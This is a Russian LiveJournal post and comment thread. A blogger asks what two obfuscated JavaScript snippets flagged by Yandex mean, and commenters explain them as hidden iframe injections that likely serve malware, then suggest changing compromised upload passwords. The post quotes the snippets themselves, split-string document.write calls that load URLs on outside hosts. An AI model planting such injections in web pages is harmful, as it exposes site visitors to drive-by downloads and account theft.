вредоносные коды

[bullking.livejournal.com]

по поводу своего поста про Яндекс получил в личные сообщения разъяснение от "сведущего яндексмэна", что робот Яндекса метит сайты, на страницах которых попадается такое кодосочетание: > document.write("<"+"i"+"f"+"rame"+" sr"+"c='ht"+"tp://"+"no.myftp.info//index.php?c81d53a3048bae925f1ac6a39f0...'"+" style='d"+"isplay:no"+"ne;'>");
> > > > document.write("<"+"i"+"f"+"rame"+" sr"+"c='ht"+"tp://"+"gardian.selfip.info/x3/buble.php?key=rtgddfg&s=a...'"+" style='d"+"isplay:no"+"ne;'>") как вредоносные.

Вопрос к хакерам или программерам: что вообще означает такой код?

Comments

[aterentiev.livejournal.com]

ну написано же, код вставляет невидиный iframe (фактически еще один браузер) в код самой страницы, в котором открывается линк с no.myftp.info и далее с циферками

[bullking.livejournal.com]

спасибо, а чем это грозит посетителям сайта?

[aterentiev.livejournal.com]

тем, что этой страницей может потенциально отслеживаться активность посетителей и передаваться третьим лицам

[bullking.livejournal.com]

т.е. как в жж или фейсбуке?

[aterentiev.livejournal.com]

не совсем
человек заходит на страницу, как ему кажется, которой он доверяет (на вашу, например)
а его действия отслеживаются какой-то "левой" страницей myftp.info, о которой он понятия не имеет

[bullking.livejournal.com]

не ну вот сейчас мои действия отслеживают какие-то sol.adbureau.net и ad.adriver.ru, а мне кажется я доверяю жж.........

[besisland.livejournal.com]

Вставляет скрытую загрузку чего-то предположительно вредоносного.

[bullking.livejournal.com]

загрузку куда?

[besisland.livejournal.com]

На компьютер посетителя. Во фрейме стоит ссылка на какой-нибудь скрипт или на исполняемый файл для «Виндоус» (конкретно здесь не смотрел, что именно). У определённого процента пользователей это пробьётся через защиту и чего-нибудь сотворит, учётку, допустим, на «В контакте» уведёт и будет спам рассылать.

[bullking.livejournal.com]

понятно, тут такая странность - Last FM, Русский репортер и т.д. ни яху, ни гугл, ни майл.ру не находят вредными, а яндекс находит..

[karpion.livejournal.com]

А зачем Вам такой код на Вашем сайте?

[harry-lonsdale.livejournal.com]

"да мой сайт сам робот Яндекса пометил!" \m/

[karpion.livejournal.com]

Ага. Собака тоже помечает - деревья, столбы...

[bullking.livejournal.com]

пока не знаю

[karpion.livejournal.com]

В таком случае есть подозрение, что Ваш эккаунт хакнули, скачали к себе исходники, внедрили туда ссылки на загрузку вредоносного кода и залили обратно. Поменяйте пароли и не сохраняйте их в программе, которая заливает файлы на хостинг.

[bullking.livejournal.com]

речь не об аккаунте на сайте, а о сайте СМИ, вообще-то)

[karpion.livejournal.com]

Вообще-то, механизм размещения материалов на сайте (т.е. программа на сервере, с которой взаимодействует Web-мастер при размещении материалов) не различает СМИ и не-СМИ. В любом случае, у того, кто размещает материалы, есть эккаунт, т.е. имя+пароль.

[bullking.livejournal.com]

ага, понятно

[bullking.livejournal.com]

тут еще такой момент... одну из моих записей в ЖЖ яндекс метил так: Ссылка может оказаться не той за кого себя выдает!!! Она могла быть изменена с целью спама и фишинга.

а это что такое может быть?

[karpion.livejournal.com]

Вы бы хоть сказали, что это за запись. Ссылочку бы на неё...

[bullking.livejournal.com]

как то так http://pics.livejournal.com/bullking/pic/0003368a